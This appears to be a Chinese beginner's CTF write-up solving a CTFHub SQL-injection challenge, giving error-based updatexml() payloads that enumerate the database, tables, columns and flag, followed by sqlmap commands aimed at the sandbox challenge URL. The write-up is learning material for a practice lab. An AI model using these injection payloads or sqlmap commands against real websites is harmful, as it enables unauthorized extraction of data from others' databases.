赞
踩
首先测试注入点
and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试
发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注;
查询数据库
构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)–
得到数据库名:sqli
查询数据表
构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘sqli’)),1)–+
得到数据表名 news和flag
查询列名
构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’)),1)–+
得到列名:flag
查询flag中的内容
构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(flag) from flag)),1)–+
得到flag
sqlmap语句:python sqlmap.py -u http://challenge-f0b5f3329ce90bdc.sandbox.ctfhub.com:10080/?id=1 --batch判断是否有注入点
发现存在注入点 且注入类型可能为报错注入 和时间盲注
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210528104911112.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ3MjcxNjM4,size_16,color_FFFFFF,t_7
查询数据库名
sqlmap 语句:python sqlmap.py -u http://challenge-f0b5f3329ce90bdc.sandbox.ctfhub.com:10080/?id=1 --dbs --batch
_
得到数据库名
查询数据表名
sqlmap语句:python sqlmap.py -u http://challenge-f0b5f3329ce90bdc.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables --batch
查询列名
python sqlmap.py -u http://challenge-f0b5f3329ce90bdc.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --batch
得到flag列下面的flag
注:本人萌新,请多指教。以后也会不停更新自己学习到的内容。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。